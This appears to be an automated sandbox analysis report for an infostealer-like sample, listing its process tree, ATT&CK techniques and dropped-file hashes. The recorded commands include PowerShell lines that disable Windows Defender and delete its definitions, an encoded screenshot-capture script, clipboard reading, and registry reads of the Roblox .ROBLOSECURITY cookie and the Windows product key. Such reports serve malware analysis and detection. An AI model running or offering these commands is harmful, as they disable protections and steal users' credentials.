C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9944 -childID 31 -isForBrowser -prefsHandle 9940 -prefMapHandle 9924 -prefsLen 30817 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a214122-e08e-4f42-888b-4cda80467f7b} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:5488
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7120 -childID 32 -isForBrowser -prefsHandle 6156 -prefMapHandle 8868 -prefsLen 30817 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e70f8548-c08a-4a04-bc59-f246017b0e0a} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:6104
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6192 -childID 33 -isForBrowser -prefsHandle 8084 -prefMapHandle 6140 -prefsLen 30817 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0b3c5cb6-3ad5-4654-adbc-899a49aa2aa2} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:1208
-
-
-
C:\Users\Admin\Desktop\release\x64\x64dbg.exe"C:\Users\Admin\Desktop\release\x64\x64dbg.exe"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3436 -
C:\Users\Admin\Desktop\123\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe"C:\Users\Admin\Desktop\123\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe"2⤵
- Executes dropped EXE
PID:2776
-
-
C:\Users\Admin\Desktop\release\x96dbg.exe"C:\Users\Admin\Desktop\release\x96dbg.exe"1⤵
- System Location Discovery: System Language Discovery
PID:5808 -
C:\Users\Admin\Desktop\release\x96dbg.exe"C:\Users\Admin\Desktop\release\x96dbg.exe" ::install2⤵
- Modifies system executable filetype association
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3792
-
-
C:\Users\Admin\Desktop\release\x96dbg.exe"C:\Users\Admin\Desktop\release\x96dbg.exe"1⤵
- System Location Discovery: System Language Discovery
PID:5776 -
C:\Users\Admin\Desktop\release\x64\x64dbg.exe"C:\Users\Admin\Desktop\release\x64\x64dbg.exe"2⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1144 -
C:\Users\Admin\Desktop\123\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe"C:\Users\Admin\Desktop\123\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe"3⤵
- Executes dropped EXE
PID:6784
-
-
-
C:\Users\Admin\Desktop\release\x96dbg.exe"C:\Users\Admin\Desktop\release\x96dbg.exe" "C:\Users\Admin\Desktop\123\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe"1⤵
- System Location Discovery: System Language Discovery
PID:3408 -
C:\Users\Admin\Desktop\release\x64\x64dbg.exe"C:\Users\Admin\Desktop\release\x64\x64dbg.exe" "C:\Users\Admin\Desktop\123\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe" "" "C:\Users\Admin\Desktop\123"2⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5740 -
C:\Users\Admin\Desktop\123\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe"C:\Users\Admin\Desktop\123\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe"3⤵
- Executes dropped EXE
PID:1012
-
-
-
C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: GetForegroundWindowSpam
PID:5796 -
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL inetcpl.cpl,,42⤵
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
PID:412
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:1196
-
C:\Users\Admin\Desktop\123\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe"C:\Users\Admin\Desktop\123\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe"1⤵
- Executes dropped EXE
PID:4200 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"2⤵PID:5632
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend3⤵
- Command and Scripting Interpreter: PowerShell
PID:2044
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"2⤵PID:1084
-
C:\Windows\system32\tasklist.exetasklist /FO LIST3⤵
- Enumerates processes with tasklist
PID:5248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"2⤵PID:3260
-
C:\Windows\system32\tasklist.exetasklist /FO LIST3⤵
- Enumerates processes with tasklist
PID:4372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"2⤵PID:3376
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName3⤵PID:3720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:1036 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:6288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"2⤵PID:4820
-
C:\Windows\system32\tasklist.exetasklist /FO LIST3⤵
- Enumerates processes with tasklist
PID:5492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"2⤵PID:6552
-
C:\Windows\system32\tree.comtree /A /F3⤵PID:2776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"2⤵PID:4116
-
C:\Windows\system32\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:6676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="2⤵PID:220
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=3⤵PID:1932
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fxnqrl5h\fxnqrl5h.cmdline"4⤵PID:5532
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9C18.tmp" "c:\Users\Admin\AppData\Local\Temp\fxnqrl5h\CSCCD1ED52A6825450EB86D51C9D51E71FD.TMP"5⤵PID:3776
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"2⤵PID:6672
-
C:\Windows\system32\tree.comtree /A /F3⤵PID:2416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"2⤵PID:3740
-
C:\Windows\system32\tree.comtree /A /F3⤵PID:6008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"2⤵PID:5196
-
C:\Windows\system32\tree.comtree /A /F3⤵PID:6624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"2⤵PID:7012
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3376
-
-
C:\Windows\system32\tree.comtree /A /F3⤵PID:4692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"2⤵PID:5476
-
C:\Windows\system32\tree.comtree /A /F3⤵PID:1680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"2⤵PID:5904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
PID:2680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"2⤵PID:5672
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵PID:4848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"2⤵PID:5448
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7012
-
-
C:\Windows\system32\getmac.exegetmac3⤵PID:4296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"2⤵PID:6264
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption3⤵PID:4764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"2⤵PID:3732
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory3⤵PID:6488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"2⤵PID:2312
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"2⤵PID:4940
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
PID:3432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"2⤵PID:5832
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6672
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:6624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"2⤵PID:3740
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault3⤵PID:2416
-
-
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
PID:4884
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
PID:1928
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Change Default File Association
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Change Default File Association
1Netsh Helper DLL
1Defense Evasion
Impair Defenses
2Disable or Modify System Firewall
1Modify Registry
5Obfuscated Files or Information
1Command Obfuscation
1Subvert Trust Controls
2Install Root Certificate
1SIP and Trust Provider Hijacking
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\USERS\ADMIN\APPDATA\LOCAL\PROGRAMS\FIDDLER\PLUGINS\NETWORKCONNECTIONS\TELERIK.NETWORKCONNECTIONS.WINDOWS.DLL
Filesize33KB
MD55889357424d717c8629c8bfabcd0be50
SHA187e7047a40e24bd5ac23f89e072ee39a14a53023
SHA2563564b25b24569b8d8a0128f2f4bddec89c0b8986da7542d9c64aac730360a600
SHA5121af458742cefd4730d64b19ecc05460354f0e47a79cdcd7794877aa0f6c56cfb92f37a0daf66fedaec2a579eb0187d774b7d5ba1fff65d6ab1504df4c3668fad
-
Filesize
152B
MD5f5391bd7b113cd90892553d8e903382f
SHA12a164e328c5ce2fc41f3225c65ec7e88c8be68a5
SHA256fd9710650fc6774ce452b01fb37799cd64d3cdc282ac693e918e38322349fe79
SHA51241957bea3e09c2f69487592df334edc6e3e6de3ab71beb64d9b6d9ce015e02a801b4215344d5d99765abe8ab2396394ac4664fced9f871204453a79463cc7825
-
Filesize
152B
MD52905b2a304443857a2afa4fc0b12fa24
SHA16266f131d70f5555e996420f20fa99c425074ec3
SHA2565298bdb27d48c2c2b5e67bdd435445ef5b06d9b36c11394705b413ff3d0f51f3
SHA512df85de0c817350d8ca3346def1db8653aaee51705822b4c4484c97e7d31282a2936fa516d68c298dcbbb293b044aa7101b3de0c7852c26e98ac6c91415162b53
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize600B
MD5db11e600d809a6bca660eb1eb525bd85
SHA13d492e627ef37b57f90e3dffae272930fcfeda38
SHA2563b1df58311e657d21ba725d54c266ba1db0b59fff41fb2a87b4d9f06bc9e2bed
SHA5126925092a12f715736f71125056dde6abea73cb29e019cd08d0f8309d62010c90de35293e1baf770b88eca137adb76d56f7fb2f5369fb75da8eb51bfd12fbaa70
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe59f19a.TMP
Filesize48B
MD583f4110fe7ae7181ed3360c4c1769f3c
SHA1897bebe48a34b50dd2194bfac7dca13631db8c31
SHA25610cde66d59d1daa48bd67f9a0e5631d7b671caddd1b52725ff6ebdb9936ad5fd
SHA5120f5bef9b99e2fb564d8b79569091e90d57ccafe58323402376339406be357669405ea39c169e48667a5207044908cba43b937656fb7dc99d13819a02ba01307a
-
Filesize
70KB
